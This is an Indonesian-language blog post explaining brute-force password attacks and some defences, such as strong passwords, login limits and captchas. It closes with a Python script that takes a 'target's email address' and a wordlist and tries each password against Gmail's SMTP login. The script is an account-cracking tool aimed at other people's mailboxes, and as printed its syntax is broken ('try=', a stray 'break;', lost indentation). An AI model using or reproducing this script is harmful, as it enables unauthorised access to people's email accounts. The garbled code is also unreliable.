Apa Itu Brute Force ?
Bagi anda yang baru masuk dunia underground internet pasti akan terasa asing dengan kalimat ini. Tapi jika menurut anda yant udah lama di sana pasti akan sangat familiar dengan kalimat ini. Terlebih karena Brute Force adalah teknik yang sangat dasar untuk urusan previledge escallation untuk mendapatkan akses ke system yang tertarget.
Brute Force adalah teknik di mana sang hacker akan mencoba masuk ke dalam suatu sistem dengan menggunakan user dan password acak yang di dapat dari database password yang dia buat dari hasil Information Gathering dari korban atau dia mencari sendiri di internet. Teknik ini sebenarnya hanya membutuhkan sebuah keberuntungan, dan peluang untuk berhasilnya juga bergantung pada keberuntungan anda.
Jika korban anda menggunakan password yang lemah ang terdiri kurang dari kombinasi antara huruf, angka dan simbol. Atau juga masih banyak pula orang yang menggunakan tanggal lahir, tanggal pernikahan, nama anak, nama suami, atau informasi yang sangat mudah diketahui dengan teknik pengumpulan informasi sebelumnya yang dilakukan sang attacker.
Untuk menghindari serangan dari teknik ini, anda bisa :
Menggunakan password yang terdiri atas kombinasi angka dan simbol yang kuat , contohnya : $yst3m-s3Cur1ty77 . << merupakan password yang kuat karena mengandung kombinasi antara uppercase, lowercase, angka, huruf, serta simbolik yang lumayan rumit.
Hindari menjawab pertanyaan yang bersifat "mewawancarai".
Seperti orang yang se akan-akan ingin mengetahui segalanya tentang anda. Bisa saja dia mendekati anda karena ada sesuatu yang ingin ia dapat dari anda. Sang hacker saat ini tengah melakukan langkah Reconnaisance atau Information Gathering atau mengumpulkan informasi sebanyak-banyaknya dari calon korban.
Batasi percobaan login pada sistem anda.
Perlu diketahui pula bahwa brute force menggunakan ratusan bahkan sampai ribuan percobaan password. Maka dari itu, membatasi jumlah percobaan login bisa menjadi cara ampuh untuk melawan serangan brute force ini.
Gunakan Captcha
Cara ini adalah cara yang paling ampuh untuk mencegah serangan brute force. karena jika host penyerang ingin melakukan pengisian data pada sistem target, harus mengisi tantangan captcah terlebih dahulu. Sedangkan yang kita ketahui bahwa brute force itu dilakukan oleh robot dengan manusia/hacker sebagai commander nya.
import smtplib
smtpserver = smtplib.SMTP("smtp.gmail.com", 587)
smtpserver.ehlo()
smtpserver.starttls()
user = input("Enter the target's email address: ")
passwfile = input("Enter the password file name: ")
passwfile = open(passwfile, "r")
for password in passwfile:
try=
smtpserver.login(user, password)
print("[+] Password correct: " + repr(list(password)))
break;
except smtplib.SMTPAuthenticationError:
print("[!] Password incorrect: " + repr(list(password)))
